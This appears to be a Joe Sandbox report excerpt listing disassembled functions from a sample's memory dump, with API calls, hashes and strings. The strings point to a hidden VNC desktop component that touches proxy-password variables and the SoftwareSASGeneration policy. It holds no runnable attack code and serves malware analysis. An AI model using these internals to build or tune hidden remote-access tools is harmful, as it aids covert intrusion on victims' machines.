                                                      • String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
                                                      • API String ID: 803186428-2751095142
                                                      • Opcode ID: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                      • Instruction ID: d0b0260b6444e2775186e416754b1462d6944c591cbb28683b20e90924e7de67
                                                      • Opcode Fuzzy Hash: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                      • Instruction Fuzzy Hash: F8214A6293858286E324AF35D4546F5A36AFF89B14FC86431DA0E1A365CF3CF485C760
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5A72
                                                      • malloc.LIBCMT ref: 00007FF790CF5ADB
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5B0F
                                                      • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5B36
                                                      • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5B7E
                                                      • malloc.LIBCMT ref: 00007FF790CF5BDB
                                                        • Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
                                                        • Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
                                                        • Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
                                                        • Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
                                                        • Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8
                                                      • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5C10
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5C50
                                                      • free.LIBCMT ref: 00007FF790CF5C64
                                                      • free.LIBCMT ref: 00007FF790CF5C75
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                      • String ID:
                                                      • API String ID: 1080698880-0
                                                      • Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                      • Instruction ID: b3b89546584301aab60605ba7965e0436d2172cf8fbf39a3e52b84a1c4dacbf6
                                                      • Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                      • Instruction Fuzzy Hash: C881B132A287428AEB30AF3594511A9B6E5FF4A7A4F944235DB1D837D4DF3CF5018721
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 744660428-3977938048
                                                      • Opcode ID: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
                                                      • Instruction ID: c6da242f153bbdf3fbb0d0446a0f0f492015490c31f727febcc27585d0403273
                                                      • Opcode Fuzzy Hash: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
                                                      • Instruction Fuzzy Hash: 59D18126A1C6C185E760AB35C4587FEABA1EF86B88F994131DA4C077E5CF39F485C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 2523754900-3977938048
                                                      • Opcode ID: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                      • Instruction ID: 0638a877e2cacd259d35d38a0460973a9a39603d95a3ef8aa7b6ae40b8297eb1
                                                      • Opcode Fuzzy Hash: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                      • Instruction Fuzzy Hash: 5EB1B126A2C69185E760EB35C4587FEABA1EF86B88F954131DA4C477A5CF3CF481C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 744660428-3977938048
                                                      • Opcode ID: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
                                                      • Instruction ID: b503c5443cad5b61206077e929d8b5c444b2b853c8848f52cb9c5f8a74d71947
                                                      • Opcode Fuzzy Hash: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
                                                      • Instruction Fuzzy Hash: 16B1B126A2C69185E760EB35C4587FEABA1EF86B48F994131DA4C077A5CF3CF485C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
                                                      • String ID: ConsoleWindowClass$tty
                                                      • API String ID: 490048385-1921057836
                                                      • Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                      • Instruction ID: 2fa1d676bdb2671f3642ced7efe00b3dcf5a5fad70b4763a9372dee484dbf491
                                                      • Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                      • Instruction Fuzzy Hash: 0D416C36718A868ADB309B36E4846A9B7A0FF89B84F945035DE8E43B54DF3CF445CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CursorEnterLeave$Rect
                                                      • String ID: ^
                                                      • API String ID: 2550375211-1590793086
                                                      • Opcode ID: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                      • Instruction ID: a1ccd932ebc41aa4f8e45b0a603adde297d68d6246ca94fbe405a826f02a4fb0
                                                      • Opcode Fuzzy Hash: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                      • Instruction Fuzzy Hash: 9C4118366186818BDB28DF35E5942ADB7B0FB89B94F504236DB5E03B94CF38E464CB10
                                                      APIs
                                                      Strings
                                                      • HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF790C3A726
                                                      • HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF790C3A738
                                                      • HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF790C3A7E7
                                                      • HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF790C3A7AC
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorInfoLastParametersSystem
                                                      • String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
                                                      • API String ID: 2777246624-2146332292
                                                      • Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                      • Instruction ID: ba2a4aa0393e3522fd8a99d777c756109fe170abfa6dda954041213bf0c6d518
                                                      • Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                      • Instruction Fuzzy Hash: C0419E75A286828AE734EF31B8406A9B3B0FB86748F801136DA8D47B58DE3DF555CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wgetenv$_errno_invalid_parameter_noinfo
                                                      • String ID: CONNECT_PASSWORD$HTTP_PROXY_PASSWORD$SOCKS5_PASSWD$SOCKS5_PASSWORD
                                                      • API String ID: 1184729097-3964388033
                                                      • Opcode ID: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                      • Instruction ID: 8d4b8761cf100e2e2be040e423fca4dd7d807902818f9c575814369d11e55380
                                                      • Opcode Fuzzy Hash: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                      • Instruction Fuzzy Hash: FF21AB21A3AA4640FEB5FB35D4512F4D2A2AF65740FCC5435EB0D463A2FE2CF951C220
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ChainChangeClipboardCurrentKillThreadTimer
                                                      • String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                      • API String ID: 3622578367-539335655
                                                      • Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                      • Instruction ID: bc57a862b868c05ccf9f575a52c776f2e1e4c7fdf349b6d0e0dcf3f2b9331df9
                                                      • Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                      • Instruction Fuzzy Hash: EF216BA6A2898392F67DFB30A9441F5E3A1FF45700FC85432C61E46291DE3CF4A49220
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close$CreateOpenValue
                                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                      • API String ID: 678895439-3579764778
                                                      • Opcode ID: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                      • Instruction ID: 6d3a32f8426cf57763fda7302b60eacac95f2383d0ab93ab49c28e96d8a9a25c
                                                      • Opcode Fuzzy Hash: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                      • Instruction Fuzzy Hash: 8D112C72A28B4286EB609B34F84465AF7B4FB84788F801135E68D43B68DF3CE149CF00
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close$CreateDeleteOpenValue
                                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                      • API String ID: 2881815620-3579764778
                                                      • Opcode ID: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                      • Instruction ID: 65f2e9b320303255acc9a7580fcca9b020cfaef3ab1eeaf7d6eed4c056f082af
                                                      • Opcode Fuzzy Hash: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                      • Instruction Fuzzy Hash: C9010032A28B4682DB60EB35F84456AF7B5FB84794F802135EA8D47B64DF3CE149CB10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$_invalid_parameter_noinfofreemalloc
                                                      • String ID:
                                                      • API String ID: 3646291181-0
                                                      • Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                      • Instruction ID: 7ead286aec5f03d77cde233b8cff03eaf289737c415f762752a2bf885aa9da21
                                                      • Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                      • Instruction Fuzzy Hash: 92518122A286428AE730BB7594443EDB6E0EF467A4F944631EA1E077C6DF7CF8419721
                                                      APIs
                                                      • _lock.LIBCMT ref: 00007FF790CEAD95
                                                        • Part of subcall function 00007FF790CF77D0: _amsg_exit.LIBCMT ref: 00007FF790CF77FA
